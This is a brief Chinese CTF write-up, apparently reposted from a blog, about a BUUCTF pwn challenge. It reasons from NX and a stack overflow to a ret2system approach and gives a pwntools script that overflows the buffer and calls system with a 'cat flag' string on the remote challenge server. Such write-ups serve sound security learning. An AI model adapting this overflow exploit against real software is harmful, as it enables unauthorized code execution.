日常buu
作者:互联网
国际惯例
Ida
没啥问题,去看看mem_test函数有没有问题。
NX还有栈溢出难道是ROP?还是gdb看看hint是啥吧。
哦豁!
哦豁!
那这样思路有了栈溢出system执行catflag。
from pwn import*
r=remote("node3.buuoj.cn",27175)
system_addr = 0x08048440
catflag_addr = 0x080487E0
payload='A'*0x17 + p32(system_addr) + p32(0x080487E0) + p32(0x080487E0)
r.sendline(payload)
r.interactive()
标签:addr,system,catflag,buu,日常,0x080487E0,p32,payload 来源: https://www.cnblogs.com/shidaofu/p/14842984.html